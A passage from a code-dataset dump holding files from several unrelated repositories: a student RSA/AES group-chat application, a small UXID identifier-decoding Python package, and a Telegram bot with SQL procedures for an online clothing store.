private_key\nglobal public_key\nglobal _netif\n\ndef init_user(addr):\n global address\n global private_key\n global public_key\n global _netif\n address = addr\n public_key = getPublicKey(addr)\n private_key = get_private_key(addr)\n _netif = network_interface('./', address)\n\ndef sign(message, private_key):\n\th = SHA256.new(message)\n\tsignature = PKCS1_PSS.new(private_key).sign(h)\n\n\treturn signature\n\n\ndef encrypt_AES(message, key):\n\t#if(key == -1):\n\t#\tprint('Cannot encrypt text before shared secret is established.')\n\tcipher_aes = AES.new(key, AES.MODE_EAX)\n\tciphertext, tag = cipher_aes.encrypt_and_digest(message)\n\treturn ciphertext, cipher_aes.nonce, tag\n\n\ndef getPublicKey(address):\n\tkey_file = \"keys/\"+address+\"_pub.pem\"\n\twith open(key_file) as f:\n\t\tkey = RSA.import_key(f.read())\n\n\treturn key\n\ndef get_private_key(address):\n\tkey_file = \"keys/\"+address+\"_priv.pem\"\n\twith open(key_file) as f:\n\t\tkey = RSA.import_key(f.read())\n\treturn key\n\ndef decrypt_AES(message, key):\n\t#if(key == -1):\n\t#\tprint('Cannot encrypt text before shared secret is established.')\n\ttag = message[-16:]\n\tmsg_nonce = message[-32:-16]\n\tciphertext = message[:-32]\n\tprint('tag: ', tag, '\\nnonce: ', msg_nonce, '\\nciphertext: ', ciphertext)\n\tcipher_aes = AES.new(key, AES.MODE_EAX, msg_nonce)\n\tplaintext = cipher_aes.decrypt_and_verify(ciphertext, tag)\n\treturn plaintext\n\n\ndef generateSharedSecretDict(user_list):\n secrets_dict = dict()\n\n for usr in user_list:\n with open('./keys/' + usr +'_pub.pem', 'r') as usr_kfile:\n usr_kstr = usr_kfile.read()\n user_key = RSA.import_key(usr_kstr)\n cipher_rsa = PKCS1_OAEP.new(user_key)\n enc_session_key = cipher_rsa.encrypt(session_key)\n secrets_dict[usr] = b64encode(enc_session_key).decode('ascii')\n return secrets_dict\n\n\ndef generateSharedSecretString(user_list):\n\tbyte_str = b\"\"\n\n\tfor usr in user_list:\n\t\twith open('./keys/' + usr +'_pub.pem', 'r') as usr_kfile:\n\t\t\tusr_kstr = usr_kfile.read()\n\t\t\tuser_key = RSA.import_key(usr_kstr)\n\t\t\tcipher_rsa = PKCS1_OAEP.new(user_key)\n\t\t\tenc_session_key = cipher_rsa.encrypt(session_key)\n\t\t\tbyte_str += enc_session_key\n\treturn byte_str\n\n\ndef verifySignature(message, signature, key):\n\th = SHA256.new(message)\n\ttry:\n\t PKCS1_PSS.new(key).verify(h, signature)\n\t #print \"The signature is valid.\"\n\t return True\n\texcept (ValueError, TypeError):\n\t \t#print \"The signature is not valid.\"\n\t \treturn False\n\n\ndef parseSharedSecretString(msg):\n\tglobal session_key\n\tuser_order = msg[0:5].decode('ascii')\n\tuser_index = user_order.index(address)\n\n\tenc_session_key = msg[5+user_index*256:5+(user_index+1)*256]\n\tcipher_rsa = PKCS1_OAEP.new(private_key)\n\tsession_key = cipher_rsa.decrypt(enc_session_key)\n\treturn session_key\n\n\ndef parseSharedSecretDict(secrets_dict):\n\tenc_session_key = b64decode(secrets_dict[address].encode('ascii'))\n\tcipher_rsa = PKCS1_OAEP.new(private_key)\n\tsession_key = cipher_rsa.decrypt(enc_session_key)\n\treturn session_key\n\n\ndef establishSharedSecret(users_list):\n print('establishin...')\n global session_key\n #session_key = get_random_bytes(16)\n secret_dictionary = generateSharedSecretDict(users_list)\n print(secret_dictionary)\n json_secret_dictionary = b64encode(json.dumps(secret_dictionary).encode('ascii'))\n\n return session_key, json_secret_dictionary\n\ndef establishSharedSecretString(user_list):\n print('establishin...')\n global session_key\n session_key = get_random_bytes(16)\n secret_string = generateSharedSecretString(user_list)\n user_list_bytes = user_list.encode('ascii')\n\n return session_key, user_list_bytes+secret_string\n\n\ndef parseNewSecretMessage(msg_content):\n if verify_message_freshness(msg_content):\n print('verified correctly.')\n shared_secret = parseSharedSecretString(msg_content[2:-signature_length])\n\ndef parseTextMessage(msg_content):\n\tmsg_body = msg_content[2:-signature_length]\n\tplaintext = decrypt_AES(msg_body, session_key)\n\treturn plaintext.decode('ascii')\n\n''' HIGH LEVEL API '''\nsignature_length = 256\ndef receiveAndParseMessage(message): # Make this just a fixed thing\n\tprint('Received and parsing message: ', message)\n\tmsg_type = int(message[0:1].decode('ascii'))\n\tmsg_address = message[1:2].decode('ascii')\n\tsignature = message[-signature_length:]\n\tmsg_public_key = getPublicKey(msg_address)\n\n\tisValidSignature = verifySignature(message[0:-signature_length], signature, msg_public_key) # shoud be address\n\tif (not isValidSignature):\n\t\tprint (\"Is not valid signature\")\n\t\treturn -1, b\"\"\n\n\tret = \"\"\n\tif (msg_type == MsgType.JOIN): # Join message\n\t\tprint (\"Message type JOIN\")\n\t\t# Do nothing because the client should never receive this type of message\n\telif (msg_type == MsgType.INIT): # Init message\n\t\tprint (\"Message type INIT\")\n\t\tret = generateSharedSecretDictMessage() # Return a message of shared secret dict\n\telif (msg_type == MsgType.SECRET): # New shared secret message\n\t\tprint (\"Message type SECRET\")\n\t\tret = parseNewSecretMessage(message)\n\telif (msg_type == MsgType.LEAVE): # Leave message\n\t\tprint (\"Message type LEAVE\")\n\t\t# Do nothing because the client should never receive this type of message\n\telif (msg_type == MsgType.MSG): # Encrypted text message\n\t\tprint (\"Message type MSG\")\n\t\tret = parseTextMessage(message) # Return plaintext\n\telse:\n\t\tprint (\"Unrecognized message type: \" + str(msg_type))\n\t\treturn -1, \"\"\n\n\treturn msg_type, ret\n\ndef generateJoinMessage():\n\tmsg_type = str(int(MsgType.JOIN)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tmessage = msg_type + sent_from\n\n\tsignature = sign(message, private_key)\n\treturn message + signature\n\n\n\ndef verify_message_freshness(test_msg):\n print('verifyin secret freshness')\n msg, nonce = generateChallengeMessage(test_msg)\n _netif.send_msg('S', msg)\n\n # Drop racey messages\n status, response = _netif.receive_msg(blocking=True)\n while(response[0] != ord(str(int(MsgType.CHALLENGE)).encode('ascii'))):\n status, response = _netif.receive_msg(blocking=True)\n return challenge_response_verify(response, nonce)\n\ndef generateChallengeMessage(msg):\n print('generatin challenge message')\n hash = SHA256.new(msg).digest()\n\n msg_type = str(int(MsgType.CHALLENGE)).encode('ascii')\n sent_from = address.encode('ascii')\n nonce = get_random_bytes(16)\n\n cipher = PKCS1_OAEP.new(getPublicKey('S'))\n message_body = cipher.encrypt(nonce+hash)\n message = str(int(MsgType.CHALLENGE)).encode('ascii') + address.encode('ascii') + message_body\n signature = sign(message, private_key)\n return message + signature, nonce\n\ndef challenge_response_verify(message, expected_nonce):\n print('verifyin challenge response')\n if verifySignature(message[:-signature_length], message[-signature_length], getPublicKey('S')):\n msg_body = message[2:-256]\n cipher = PKCS1_OAEP.new(private_key)\n plaintext = cipher.decrypt(msg_body)\n if(plaintext == expected_nonce):\n return True\n return False\n\ndef generateSharedSecretDictMessage():\n\tmsg_type = str(int(MsgType.SECRET)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tsecret, string = establishSharedSecretString('ABCDE') # Note dict is sent unencrypted\n\tmessage = msg_type + sent_from + string\n\n\tsignature = sign(message, private_key)\n\n\treturn message + signature\n\n\ndef generateLeaveMessage():\n\tmsg_type = str(int(MsgType.LEAVE)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tmessage = msg_type + sent_from\n\n\tsignature = sign(message, private_key)\n\n\treturn message + signature\n\n\ndef generateTextMessage(plaintext):\n\tplaintext = plaintext.encode('ascii') if not type(plaintext) == bytes else plaintext\n\tmsg_type = str(int(MsgType.MSG)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tciphertext, msg_nonce, tag = encrypt_AES(plaintext, session_key)\n\tmsg_body = ciphertext + msg_nonce + tag\n\tmessage = msg_type + sent_from + msg_body\n\n\tsignature = sign(message, private_key)\n\tprint('Sending message: \\n', message+signature)\n\treturn message + signature\n" }, { "alpha_fraction": 0.6398210525512695, "alphanum_fraction": 0.6517524123191833, "avg_line_length": 24.788461685180664, "blob_id": "97f1e1687c1cf90fa1a348e8d7a4a4699382f028", "content_id": "01ffc9677206131186b29d04bfeb015eb3c9603b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 97, "num_lines": 52, "path": "/server.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "#server\nimport os, sys, getopt, time\nfrom netinterface import network_interface\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\n\nfrom server_func import Server\n\nNET_PATH = './'\nOWN_ADDR = 'S'\nGROUP_ADDRESSES = b'ABCDE'\n\n# ------------\n# main program\n# ------------\n\ntry:\n\topts, args = getopt.getopt(sys.argv[1:], shortopts='hp:a:', longopts=['help', 'path=', 'addr='])\nexcept getopt.GetoptError:\n\tprint('Usage: python server.py -p <network path> -a <own addr> ')\n\tsys.exit(1)\n\nfor opt, arg in opts:\n\tif opt == '-h' or opt == '--help':\n\t\tprint('Usage: python server.py -p <network path> -a <own addr> ')\n\t\tsys.exit(0)\n\telif opt == '-p' or opt == '--path':\n\t\tNET_PATH = arg\n\telif opt == '-a' or opt == '--addr':\n\t\tOWN_ADDR = arg\n\nif (NET_PATH[-1] != '/') and (NET_PATH[-1] != '\\\\'): NET_PATH += '/'\n\nif not os.access(NET_PATH, os.F_OK):\n\tprint('Error: Cannot access path ' + NET_PATH)\n\tsys.exit(1)\n\nif len(OWN_ADDR) > 1: OWN_ADDR = OWN_ADDR[0]\n\nif OWN_ADDR not in network_interface.addr_space:\n\tprint('Error: Invalid address ' + OWN_ADDR)\n\tsys.exit(1)\n\n# main loop\nnetif = network_interface(NET_PATH, OWN_ADDR)\n\nchat_server = Server(netif, 'group_members.acl', './keys/S_priv.pem')\n\nchat_server.listen()\n" }, { "alpha_fraction": 0.540229856967926, "alphanum_fraction": 0.5823754668235779, "avg_line_length": 19.076923370361328, "blob_id": "192d68ad95d9622efb823281da5b740e19217088", "content_id": "715472831e1f3299727c16b193994fe3357564d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/chat_protocol.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from enum import IntEnum\n\n# Size of message components (in bytes)\nMSG_TYPE_SIZE = 1\nMSG_SOURCE_SIZE = 1\nMSG_SIGNATURE_SIZE = 256\nclass MsgType(IntEnum):\n JOIN = 0\n INIT = 1\n LEAVE = 2\n MSG = 3\n SECRET = 4\n CHALLENGE = 5\n" }, { "alpha_fraction": 0.8007246255874634, "alphanum_fraction": 0.8007246255874634, "avg_line_length": 54.20000076293945, "blob_id": "66e667688cb2039ed9b368621a7b3172cab70e6c", "content_id": "a389634504450ca34a876ef9d310a00b9c3c659d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 276, "license_type": "no_license", "max_line_length": 228, "num_lines": 5, "path": "/README.md", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "# CsipCseppCsatApp\n\n## Ben Gafford, Nathan Gifford, Tristan Winquist\n\nCsipCseppCsatApp is a secure chat application that runs on network.py and netinterface.py. Uses PyCryptodome for cryptographic primitives and tkinter for the gui. Chat protocol designed to protect against common attacker models.\n" }, { "alpha_fraction": 0.6843311190605164, "alphanum_fraction": 0.6914924383163452, "avg_line_length": 23.58450698852539, "blob_id": "4343dc87f5f10ac1d65a1a564a3077f96c2c9ef9", "content_id": "360e5dbdf983e59947706efd5d7df20eab839982", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3491, "license_type": "no_license", "max_line_length": 97, "num_lines": 142, "path": "/client_interface.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#interface_functions.py\n\nimport os, sys, getopt, time\nfrom netinterface import network_interface\n\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Hash import SHA256\nfrom enum import Enum\n\nfrom chat_protocol import MsgType\nimport chat_protocol\n\n\nimport user\n\nimport tkinter\nfrom threading import Thread\n\nNET_PATH = './'\nOWN_ADDR = 'A'\nSERVER = 'S'\n\n# ------------\n# main program\n# ------------\n\ntry:\n\topts, args = getopt.getopt(sys.argv[1:], shortopts='hp:a:', longopts=['help', 'path=', 'addr='])\nexcept getopt.GetoptError:\n\tprint('Usage: python client_interface.py -p <network path> -a <own addr>')\n\tsys.exit(1)\n\nfor opt, arg in opts:\n\tif opt == '-h' or opt == '--help':\n\t\tprint('Usage: python client_interface.py -p <network path> -a <own addr>')\n\t\tsys.exit(0)\n\telif opt == '-p' or opt == '--path':\n\t\tNET_PATH = arg\n\telif opt == '-a' or opt == '--addr':\n\t\tOWN_ADDR = arg\n\nif (NET_PATH[-1] != '/') and (NET_PATH[-1] != '\\\\'): NET_PATH += '/'\n\nif not os.access(NET_PATH, os.F_OK):\n\tprint('Error: Cannot access path ' + NET_PATH)\n\tsys.exit(1)\n\nif len(OWN_ADDR) > 1: OWN_ADDR = OWN_ADDR[0]\n\nif OWN_ADDR not in network_interface.addr_space:\n\tprint('Error: Invalid address ' + OWN_ADDR)\n\tsys.exit(1)\n\nuser.init_user(OWN_ADDR)\n\n\n# start main loop\nnetif = network_interface(NET_PATH, OWN_ADDR)\n\n\n## send join, recieve init, and generate new secret\njoin_msg = user.generateJoinMessage()\nnetif.send_msg('S', join_msg)\nstatus, respond_msg = netif.receive_msg(blocking=True)\nif not status:\n\tprint('no response from the server, exiting')\n\tquit()\nelif status:\n\tmsg_type, msg = user.receiveAndParseMessage(respond_msg)\n\tnetif.send_msg('S', msg)\nprint('join protocol finished')\n\n\n\n\n## gui\ndef gui_send(event = None):\n\n\tmsg_list.insert(tkinter.END, 'you: ' + my_msg.get())\n\tplain_msg = my_msg.get()\n\tenc_msg = user.generateTextMessage(plain_msg)\n\tmy_msg.set('')\n\t## send actually send a message.\n\tnetif.send_msg('S', enc_msg)\n\n\n\ndef gui_recieve():\n\twhile True:\n\t\tstatus, msg = netif.receive_msg(blocking=True)\n\t\tmsg_type, parsed_msg = user.receiveAndParseMessage(msg)\n\t\tif msg_type == '1':\n \t\t\tnetif.send_msg('S', parsed_msg)\n\t\telse:#\n\t\t\tif msg_type == '2':\n\t\t\t\treturn\n\t\t\ttext_msg = parsed_msg\n\t\t\tif msg and text_msg:\n\t\t\t\t\tmsg = msg if type(type) != bytes else msg.decode()\n\t\t\t\t\ttext_msg = text_msg if type(text_msg) != bytes else text_msg.decode()\n\t\t\t\t\tmsg_list.insert(tkinter.END, chr(msg[1]) + ': ' + text_msg)\n\n\ndef on_closing(event=None):\n\tnetif.send_msg('S', user.generateLeaveMessage())\n\ttop.quit()\n\ttop.destroy()\n\tprint('disconnected from server')\n\tquit()\n\n\ntop = tkinter.Tk()\ntop.title('CsippCseppCsatApp')\n\nmessages_frame = tkinter.Frame(top)\nmy_msg = tkinter.StringVar()\nscrollbar = tkinter.Scrollbar(messages_frame)\n\nmsg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)\nscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\nmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\nmsg_list.pack()\n\nmessages_frame.pack()\n\nentry_field = tkinter.Entry(top, textvariable=my_msg)\nentry_field.bind(\"<Return>\", gui_send)\nentry_field.pack()\nsend_button = tkinter.Button(top, text=\"Send\", command=gui_send)\nsend_button.pack()\n\ntop.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\nreceive_thread = Thread(target=gui_recieve)\nreceive_thread.start()\n\ntkinter.mainloop() # Starts GUI execution.\n" } ]
8
riddler/uxid-py
https://github.com/riddler/uxid-py
76492262e118e89792c4b2f68df8e7c650cd2df2
051089cfa8f46c68c427e1602c6e71c212260078
4d854f77ced99aea51c06f7bf4fd9f3e4cf97291
refs/heads/main
2023-01-30T17:37:26.681707
2020-11-30T19:27:20
2020-11-30T19:27:20
317,321,563
0
0
NOASSERTION
2020-11-30T19:14:12
2020-11-30T19:14:37
2020-11-30T19:27:21
Python
[ { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 13.666666984558105, "blob_id": "352739b5b452b646982f18f0f1fac10d5c01c1b9", "content_id": "c21104866f9a8a2aad5c3ada393cf65aa22ed08d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "permissive", "max_line_length": 35, "num_lines": 3, "path": "/README.md", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "# UXID\n\nUser Experience focused Identifiers\n" }, { "alpha_fraction": 0.5839999914169312, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 14.625, "blob_id": "db242c6ae3490f3f3a96994afed422a197bb0b60", "content_id": "5ef4fa3fe9ba437f03e26dae4c2da255f0b50606", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "permissive", "max_line_length": 47, "num_lines": 16, "path": "/uxid/__init__.py", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "\"\"\"\n uxid\n ~~~~\n\n User Experience focused Identifier\n\n :copyright: (c) 2020 JohnnyT.\n :license: MIT, see LICENSE for more details\n\"\"\"\nfrom . import api, uxid\n\ndecode = api.decode\n\nUXID = uxid.UXID\n\n__all__ = api.__all__ + uxid.__all__\n" }, { "alpha_fraction": 0.5905923247337341, "alphanum_fraction": 0.6132404208183289, "avg_line_length": 21.076923370361328, "blob_id": "09e9d9b46bd91b8a73145a75528eace60caebb25", "content_id": "e9da1085a10bcae43c8bea52ff934e9c67d8092f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 574, "license_type": "permissive", "max_line_length": 98, "num_lines": 26, "path": "/uxid/api.py", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "\"\"\"\n uxid/api\n ~~~~~~~~\n\n Public API of the UXID package.\n\"\"\"\nimport re\n\nfrom . import uxid\n\n__all__ = ['decode']\n\nCROCKFORD_ENCODING = \"0123456789ABCDEFGHJKMNPQRSTVWXYZ\"\nINVALID_REGEX = re.compile(\"[^%s]\" % CROCKFORD_ENCODING)\n\n\ndef decode(string):\n if isinstance(string, str):\n len_value = len(string)\n\n if len_value == 0:\n raise ValueError('input is required')\n if INVALID_REGEX.match(string):\n raise ValueError('expected input to be a Base32 encoded string, got: \\'%s\\'' % string)\n\n return uxid.UXID(string)\n" }, { "alpha_fraction": 0.5581717491149902, "alphanum_fraction": 0.5817174315452576, "avg_line_length": 22.29032325744629, "blob_id": "bd0586759ff9da33b956f10b2a106f907e27d855", "content_id": "fc32d46869c55b1c9bc8500e711e7939a65eff77", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "permissive", "max_line_length": 59, "num_lines": 31, "path": "/uxid/uxid.py", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "\"\"\"\n uxid/uxid\n ~~~~~~~~~\n\n Object representation of a UXID.\n\"\"\"\nimport math\n\n__all__ = ['UXID']\n\nCROCKFORD_ENCODING = '0123456789ABCDEFGHJKMNPQRSTVWXYZ'\nTIME_LEN = 10\n\nclass UXID(object):\n __slots__ = ['encoded', 'time']\n\n def __init__(self, encoded):\n self.encoded = encoded\n self.decode_time()\n\n def decode_time(self):\n decoded_time = 0\n time_chars = self.encoded[0:TIME_LEN][::-1]\n\n for power_index in range(TIME_LEN):\n char = time_chars[power_index]\n power_value = math.pow(32, power_index)\n alphabet_index = CROCKFORD_ENCODING.index(char)\n decoded_time += power_value * alphabet_index\n\n self.time = decoded_time\n" } ]
4
mykaminskaya/DBMS-project
https://github.com/mykaminskaya/DBMS-project
12c550128c9e5ac7bb3062eb1d30665034b4730f
c1f00fca388d7f75d382f3a437f0a3e7164802fd
0f4baf8ba1e7feb51ec847459761621445affd0a
refs/heads/master
2023-02-01T23:56:47.180939
2020-12-21T11:29:29
2020-12-21T11:29:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8235294222831726, "avg_line_length": 21.66666603088379, "blob_id": "18db1299a2938693cf71406f9bab399d350a9eb7", "content_id": "e4c721821c5dc7459b265c4a552fe7a19f44072a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 113, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/README.md", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "# DBMS-project\n\nОписывается модель работы интернет магазина одежды.\n" }, { "alpha_fraction": 0.7224669456481934, "alphanum_fraction": 0.7236683964729309, "avg_line_length": 25.849462509155273, "blob_id": "260751ef513ae4998653ee7c0eb177cf056b241f", "content_id": "ad38f665d6572f50a859988cdb91dabfcf14b403", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2533, "license_type": "no_license", "max_line_length": 139, "num_lines": 93, "path": "/procedures.ddl", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "IF OBJECT_ID('GetClientPurchases', 'P') IS NOT NULL\n DROP PROC GetClientPurchases;\n\nGO\n\nCREATE PROCEDURE GetClientPurchases @id_client INT\nAS \nBEGIN\n SELECT order.id_order, product.id_product, product.product_type, product.price\n FROM order\n JOIN product_order ON order.id_order = product_order.id_order\n JOIN product ON product_order.id_product = product.id_product\n WHERE order.id_client = @id_client\nEND;\nGO\n\n\nIF OBJECT_ID('GetCourierTimetable', 'P') IS NOT NULL\n DROP PROC GetCourierTimetable;\n\nGO\n\nCREATE PROCEDURE GetCourierTimetable @id_courier INT, @delivery_time_start DATETIME, @delivery_time_end DATETIME\nAS \nBEGIN\n SELECT parcel.delivery_time_start, parcel.delivery_time_end, parcel.id_parcel, parcel.delivery_type, parcel.address, client.client_name\n FROM parcel\n JOIN order ON parcel.id_order = order.id_order\n JOIN client ON order.id_client = client.id_client\n WHERE parcel.id_courier = @id_courier AND parcel.delivery_time_start < @delivery_time_end\n AND parcel.delivery_time_end > @delivery_time_start\n ORDER BY parcel.delivery_time_start\nEND;\nGO\n\n\nIF OBJECT_ID('GetOrderSummary', 'P') IS NOT NULL\n DROP PROC GetOrderSummary;\n\nGO\n\nCREATE PROCEDURE GetOrderSummary @id_order INT\nAS \nBEGIN\n SELECT order.id_order, order.sum, order.discount, client.id_client, client.name, client.phone_number\n FROM order\n JOIN client ON order.id_client = client.id_client\n WHERE order.id_order = @id_order\nEND;\nGO\n\n\nIF OBJECT_ID('GetOrderParcels', 'P') IS NOT NULL\n DROP PROC GetOrderParcels;\n\nGO\n\nCREATE PROCEDURE GetOrderParcels @id_order INT\nAS \nBEGIN\n SELECT id_parcel, payment_type, delivery_type, delivery_time_start, delivery_time_end, address, id_courier, id_storage\n FROM parcel\n WHERE parcel.id_order = @id_order\nEND;\nGO\n\n\nCREATE TABLE History_Products (\n id_operation INT PRIMARY KEY,\n id_product INT,\n operation VARCHAR(200),\n operation_time DATETIME DEFAULT GETDATE(),\n);\nGO\n\nCREATE TRIGGER Product_INSERT ON product\nAFTER INSERT\nAS\nBEGIN\n INSERT INTO History_Products(id_product, operation)\n SELECT id_operation, 'Добавлен товар ' + product.product_type + 'бренда' + product.brand\n FROM INSERTED\nEND;\nGO\n\nCREATE TRIGGER Product_DELETE ON product\nAFTER DELETE\nAS\nBEGIN\n INSERT INTO History_Products(id_product, operation)\n SELECT id_operation, 'Удален товар ' + product.product_type + 'бренда' + product.brand\n FROM DELETED\nEND;\n" }, { "alpha_fraction": 0.5828326344490051, "alphanum_fraction": 0.5944206118583679, "avg_line_length": 45.29138946533203, "blob_id": "59563cef6d5cf41ed9507584f3303d43a0ce03e5", "content_id": "838d027a3ae879daf16b67dccf8f491a28ed386f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7973, "license_type": "no_license", "max_line_length": 124, "num_lines": 151, "path": "/tgbot.py", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport telebot\nimport config\nfrom telebot import types\nfrom data_handler import SQLiter\nfrom datetime import datetime\n\nbot = telebot.TeleBot(config.API_TOKEN)\n\nmarkup_menu = types.InlineKeyboardMarkup(row_width=1)\nbtn_client = types.InlineKeyboardButton('Просмотреть заказы клиента', callback_data='client')\nbtn_courier = types.InlineKeyboardButton('Узнать расписание курьера', callback_data='courier')\nbtn_delivery = types.InlineKeyboardButton('Получить информациию по заказу', callback_data='order')\nbtn_product = types.InlineKeyboardButton('Добавить товар в каталог', callback_data='add product')\nbtn_editorder = types.InlineKeyboardButton('Редактировать заказ', callback_data='edit order')\nmarkup_menu.add(btn_client, btn_courier, btn_delivery, btn_product, btn_editorder)\n\nmarkup_menu1 = types.InlineKeyboardMarkup()\nbtn_address = types.InlineKeyboardButton('Адрес доставки', callback_data='address')\nbtn_payment = types.InlineKeyboardButton('Способ оплаты', callback_data='payment')\nmarkup_menu1.add(btn_address, btn_payment)\n\n\[email protected]_handler(commands=['start', 'help'])\ndef send_welcome(message):\n bot.reply_to(message, 'Добро пожаловать! Выберете действие, которое хотите совершить: /start', reply_markup=markup_menu)\n\n\[email protected]_query_handler(func=lambda call:True)\ndef call_back_order(call):\n if call.data == 'order':\n bot.send_message(call.message.chat.id, 'Введите ID заказа')\n order_summary_info()\n elif call.data == 'client':\n bot.send_message(call.message.chat.id, 'Введите ID клиента')\n get_client_info()\n elif call.data == 'courier':\n bot.send_message(call.message.chat.id, 'Чтобы узнать расписание курьера, введите его ID,'\n 'начало и конец временного промежутка в формате yyyy-mm-dd h:mm\\n'\n 'Пример ввода: 1, 2020-12-15 7:00, 2020-12-30 17:00')\n get_courier_timetable_info()\n elif call.data == 'add product':\n bot.send_message(call.message.chat.id, 'Введите следующие характеристики товара:'\n 'Артикул, бренд, сезон, размер, пол, тип, цвет, материал, цена, '\n 'страна производства, ID поставщика')\n add_product2()\n elif call.data == 'edit order':\n bot.send_message(call.message.chat.id, 'Выберите, что хотите изменить:', reply_markup=markup_menu1)\n elif call.data == 'address':\n bot.send_message(call.message.chat.id, 'Введите ID заказа и новый адрес')\n change_address1()\n elif call.data == 'payment':\n bot.send_message(call.message.chat.id, 'Введите ID заказа и желаемый способ оплаты')\n change_payment1()\n\n\ndef change_payment1():\n @bot.message_handler(content_types=['text'])\n def change_payment2(message):\n s = message.text.split(', ')\n db = SQLiter(config.database_name)\n result = db.change_payment(s[0], s[1])\n if result == 0:\n bot.send_message(message.chat.id, 'Ошибка! Заказа с таким ID не найдено.')\n else:\n bot.send_message(message.chat.id, 'Метод оплаты успешно изменен.')\n parc = db.get_parcels(s[0])\n for c in parc:\n bot.send_message(message.chat.id, 'ID заказа: ' + str(c[0]) + '\\nID посылки: ' + str(c[1]) +\n '\\nСпособ оплаты: ' + str(c[2]) + '\\n')\n\n\ndef change_address1():\n @bot.message_handler(content_types=['text'])\n def change_address2(message):\n s = message.text.split(', ')\n db = SQLiter(config.database_name)\n result = db.change_address(s[0], s[1])\n if result == 0:\n bot.send_message(message.chat.id, 'Ошибка! Заказа с таким ID не найдено.')\n elif result == 1:\n bot.send_message(message.chat.id, 'Ошибка! Неверный адрес.')\n else:\n bot.send_message(message.chat.id, 'Адрес успешно изменен.')\n addr = db.get_address(s[0])\n for c in addr:\n bot.send_message(message.chat.id, 'ID заказа: ' + str(c[0]) + '\\nID посылки: ' + str(c[1]) +\n '\\nАдрес доставки: ' + str(c[2]) + '\\n')\n\n\ndef add_product2():\n @bot.message_handler(content_types=['text'])\n def add_product1(message):\n description = message.text.split(', ')\n db = SQLiter(config.database_name)\n result = db.add_product(description)\n if result == 1:\n bot.send_message(message.chat.id, 'Товар успешно добавлен в каталог.')\n catal = db.get_product_info(description[0])\n bot.send_message(message.chat.id, 'Продукт с артикулом ' + str(catal[0][0]) +\n ' присутствует в каталоге и имеет тип ' + str(catal[0][1]))\n else:\n bot.send_message(message.chat.id, 'Ошибка! Уже есть товар с таким артикулом.')\n\n\ndef get_courier_timetable_info():\n @bot.message_handler(content_types=['text'])\n def courier_timetable(message):\n s = message.text.split(', ')\n start = datetime.strptime(s[1], '%Y-%m-%d %H:%M')\n end = datetime.strptime(s[2], '%Y-%m-%d %H:%M')\n db = SQLiter(config.database_name)\n timetable = db.get_courier_timetable(s[0], start, end)\n if len(timetable) == 0:\n bot.send_message(message.chat.id, 'Нет поставок в заданный промежуток времени.')\n else:\n for c in timetable:\n info = 'Время доставки с ' + str(c[0]) + ' по ' + str(c[1]) + '\\nID посылки: '\\\n + str(c[2]) + '\\nСпособ доставки: ' + str(c[3]) + '\\nАдрес: ' + str(c[4]) + '\\nИмя клиента: '+ str(c[5])\n bot.send_message(message.chat.id, info)\n\n\ndef get_client_info():\n @bot.message_handler(content_types=['text'])\n def client_info(message):\n db = SQLiter(config.database_name)\n order = db.get_client_purchases(message.text)\n if len(order) == 0:\n bot.send_message(message.chat.id, 'Нет клиента с таким ID.')\n else:\n for c in order:\n info = 'ID заказа: ' + str(c[0]) + '\\nID товара: ' + str(c[1]) + '\\nТип товара: '\\\n + str(c[2]) + '\\nЦена: ' + str(c[3]) + 'руб. \\nКоличество: ' + str(c[4])\n bot.send_message(message.chat.id, 